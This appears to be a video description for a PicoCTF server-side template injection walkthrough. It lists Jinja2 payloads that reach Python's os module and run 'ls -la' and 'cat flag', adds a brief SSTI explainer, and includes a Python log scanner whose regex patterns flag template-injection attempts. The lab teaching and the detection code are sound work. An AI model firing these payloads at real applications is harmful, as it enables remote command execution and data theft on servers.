Here are the payloads used in this video to solve this PicoCTF challenge:
1. To check if the website is vulnerable to SSTI: {{7*7}}
2. {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('ls -la').read() }}
3. {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('cat flag').read() }}
Server Side Template Injection (SSTI) Explained! In this PicoCTF walkthrough, I explore SSTI vulnerabilities, test for execution using Jinja2 payloads and escalate the attack to retrieve the flag using system commands!
What is Server Side Template Injection (SSTI)?
A template engine generates a web page by combining a fixed template with volatile data. A server-side template injection (SSTI) attack is when a threat actor exploits the template's native syntax to inject malicious payloads into the template itself. The compromised template is then executed server-side.
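One way to spot the payloads listed above in web server logs, as an added example that is not from the video: it flags request parameters that carry Jinja2 delimiters and separates simple syntax probes from attempts to reach Python internals. The combined log format, the `/announce` route, the `content` parameter and the sample lines are all constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Jinja2 expression and statement delimiters: {{ ... }} and {% ... %}
DELIMS = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)
# Dunder attributes and the _TemplateReference__context name seen in the
# payloads above; ordinary form input has no reason to contain them.
TRAVERSAL = re.compile(r"__\w+__|_TemplateReference__")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(value):
    """Return None, 'syntax-probe' or 'object-traversal' for one parameter."""
    for _ in range(2):                      # undo double URL-encoding
        value = unquote(value)
    exprs = DELIMS.findall(value)
    if not exprs:
        return None
    if any(TRAVERSAL.search(e) for e in exprs):
        return "object-traversal"
    return "syntax-probe"

def scan(lines):
    """Return (client_ip, parameter, verdict) for each suspicious parameter."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue                        # not a request line we understand
        ip, target = m.groups()
        query = urlsplit(target).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            verdict = classify(value)
            if verdict:
                findings.append((ip, name, verdict))
    return findings

# Constructed sample log lines (documentation IPs, hypothetical /announce route).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Mar/2025:12:00:01 +0000] "GET /announce?content=hello+world HTTP/1.1" 200 312',
    '203.0.113.9 - - [10/Mar/2025:12:00:05 +0000] "GET /announce?content=%7B%7B7*7%7D%7D HTTP/1.1" 200 298',
    '203.0.113.9 - - [10/Mar/2025:12:00:09 +0000] "GET /announce?content=%257B%257B7*7%257D%257D HTTP/1.1" 200 298',
    '203.0.113.9 - - [10/Mar/2025:12:00:14 +0000] "GET /announce?content=%7B%7B%20self._TemplateReference__context.cycler.__init__.__globals__%20%7D%7D HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A match only shows that template syntax was submitted; whether the application evaluated it has to be confirmed from the response or from the code that builds the template.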
Try it yourself on PicoCTF! If you're preparing for CTFs, ethical hacking or cybersecurity competitions, this video is for you.
Subscribe for more CTF tutorials & cybersecurity content!